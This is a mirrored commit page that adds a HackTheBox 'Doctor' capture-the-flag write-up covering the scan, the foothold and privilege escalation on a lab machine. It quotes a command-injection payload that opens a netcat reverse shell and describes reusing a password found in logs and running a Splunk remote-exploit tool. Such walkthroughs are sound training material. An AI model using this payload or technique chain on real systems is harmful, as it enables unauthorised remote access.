mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 03:53:03 +00:00
Add files via upload
This commit is contained in:
parent
91a33260e1
commit
312d8bf9ff
1 changed files with 100 additions and 0 deletions
100
HackTheBox/Doctor.md
Normal file
100
HackTheBox/Doctor.md
Normal file
|
@ -0,0 +1,100 @@
|
||||||
|
# HackTheBox-Doctor
|
||||||
|
|
||||||
|
## NMAP
|
||||||
|
|
||||||
|
```
|
||||||
|
Nmap scan report for 10.10.10.209
|
||||||
|
Host is up (0.21s latency).
|
||||||
|
Not shown: 997 filtered ports
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|
||||||
|
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
||||||
|
|_http-server-header: Apache/2.4.41 (Ubuntu)
|
||||||
|
|_http-title: Doctor
|
||||||
|
8089/tcp open ssl/http Splunkd httpd
|
||||||
|
| http-robots.txt: 1 disallowed entry
|
||||||
|
|_/
|
||||||
|
|_http-server-header: Splunkd
|
||||||
|
|_http-title: splunkd
|
||||||
|
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
|
||||||
|
| Not valid before: 2020-09-06T15:57:27
|
||||||
|
|_Not valid after: 2023-09-06T15:57:27
|
||||||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
```
|
||||||
|
|
||||||
|
## PORT 80
|
||||||
|
|
||||||
|
<img src="https://imgur.com/byFNRNC.png"/>
|
||||||
|
|
||||||
|
Looking at source code we see a domain name `doctors.htb`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/XBNWOzc.png"/>
|
||||||
|
|
||||||
|
So let's try to add this on to our `/etc/hosts`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/S0jQu4X.png"/>
|
||||||
|
|
||||||
|
## doctors.htb
|
||||||
|
|
||||||
|
<img src="https://imgur.com/fgUDmyL.png"/>
|
||||||
|
|
||||||
|
We can register and login with an account but it's not really useful
|
||||||
|
|
||||||
|
## PORT 8089
|
||||||
|
|
||||||
|
<img src="https://imgur.com/S4Iafvg.png"/>
|
||||||
|
|
||||||
|
I tried searching for default credentials for `splunkd` beacause for navigating to `servicesNS` credentials are required so I tried `admin:admin` and `admin:changeme` but didn't worked
|
||||||
|
|
||||||
|
Then I found this repository on GitHub
|
||||||
|
|
||||||
|
<img src="https://imgur.com/lt10mJd.png"/>
|
||||||
|
|
||||||
|
We are going to use `PySplunkWhisperer2_remote` because it's not being hosted on our machine
|
||||||
|
|
||||||
|
But this would not work becasue we need the credentials so I head over back to `doctors.htb` logged in as a new user at this point I didn't do it myself I had a little help from discord server
|
||||||
|
|
||||||
|
`<img src=http://IP/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'IP'$IFS'PORT')>`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/wlMMBqk.png"/>
|
||||||
|
|
||||||
|
I didn't find anything on the box through manual enumeration so going to go with `linpeas`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/MbdWgLO.png"/>
|
||||||
|
|
||||||
|
<img src="https://imgur.com/X6uDeig.png"/>
|
||||||
|
|
||||||
|
This was the only interesting thing that `linpeas` found
|
||||||
|
|
||||||
|
Reading `/var/log/apache2/backup`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/ctoci6w.png"/>
|
||||||
|
|
||||||
|
`email=Guitar123`
|
||||||
|
|
||||||
|
Now I tried this at `doctors.htb/login` to reset the password but there was no email registered with this
|
||||||
|
|
||||||
|
By ruuning linpeas and found that there is a user named `shaun` so I guessed maybe this would be his password and I logged in with `shaun`
|
||||||
|
|
||||||
|
<img src=https://imgur.com/EKTuTGh.png/>
|
||||||
|
|
||||||
|
<img src="https://imgur.com/DiJJlpW.png"/>
|
||||||
|
|
||||||
|
Then I again ran `linpeas`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/UqNF3JG.png"/>
|
||||||
|
|
||||||
|
And found some credentials in form of `bcrypt` hash
|
||||||
|
|
||||||
|
`$2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S`
|
||||||
|
|
||||||
|
But I could not crack this so I then returned to that exploit that we found and ran `python3 PySplunkWhisperer2_remote.py`
|
||||||
|
|
||||||
|
<img src="https://imgur.com/X8OTA3p.png"/>
|
||||||
|
|
||||||
|
So this means that we are authenticated and now only need to include the payload
|
||||||
|
|
||||||
|
|
||||||
|
<img src="https://imgur.com/TkGzdYr.png"/>
|
||||||
|
|
||||||
|
And we are done , this wasn't really an "Easy" machine . Coming from TryHackMe , HackTheBox is way more diffcult
|
Loading…
Reference in a new issue